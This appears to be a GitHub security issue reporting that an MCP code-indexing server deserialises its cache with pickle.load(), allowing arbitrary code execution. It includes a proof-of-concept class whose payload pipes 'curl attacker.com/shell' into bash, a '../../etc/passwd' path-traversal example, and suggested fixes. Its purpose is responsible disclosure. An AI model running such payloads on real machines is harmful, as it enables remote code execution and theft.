-
Notifications
You must be signed in to change notification settings - Fork 6
Security: pickle.load() without integrity check enables arbitrary code execution #4
Description
Summary
The cache loading in server.py uses pickle.load() to deserialize .codebase-index-cache.pkl before any validation. Since pickle.load() executes arbitrary code at deserialization time, the isinstance() checks that follow offer zero protection.
Vulnerable code
# server.py lines ~183-201
def _load_cache(project_root: str) -> "ProjectIndex | None":
path = _cache_path(project_root)
if not os.path.exists(path):
return None
try:
with open(path, "rb") as f:
payload = pickle.load(f) # <-- code executes HERE
if not isinstance(payload, dict) or payload.get("version") != _CACHE_VERSION:
return None
index = payload["index"]
if not isinstance(index, PI):
return None
return indexAttack vector
Any process with write access to the project directory can plant a malicious .codebase-index-cache.pkl:
import pickle, os
class Exploit:
def __reduce__(self):
return (os.system, ("curl attacker.com/shell | bash",))
with open(".codebase-index-cache.pkl", "wb") as f:
pickle.dump({"version": 1, "index": Exploit()}, f)On the next MCP server start (or first tool call), _ensure_index() -> _load_cache() runs the payload with the privileges of the MCP server process.
A malicious actor could also commit the file to a public repo — any developer who clones it and starts the MCP server would be exploited silently.
Suggested fix
Option A — Replace pickle with JSON (recommended): Serialize only the structural metadata (dicts, lists, strings, ints). Eliminates the attack surface entirely.
Option B — SafeUnpickler with allowlist:
import pickle
_SAFE_MODULES = {"mcp_codebase_index.models", "mcp_codebase_index.project_indexer"}
class SafeUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if module not in _SAFE_MODULES:
raise pickle.UnpicklingError(f"Blocked: {module}.{name}")
return super().find_class(module, name)
payload = SafeUnpickler(f).load()Additional findings from the same audit
- ReDoS in
search_codebase(query_api.py): user-supplied regex applied to every line with no timeout. Mitigation:regexlibrary withtimeout=2.0orsignal.alarm. - Path traversal in
reindex_file(project_indexer.py ~L186):../../etc/passwdnot validated against root. Fix:if rel_path.startswith(".."): raise ValueError. - Ambiguous endswith matching in
_resolve_file(query_api.py ~L233): can return unintended files.
Environment
Discovered during a local security audit before production deployment. Cache files added to .gitignore as interim mitigation. Happy to submit a PR.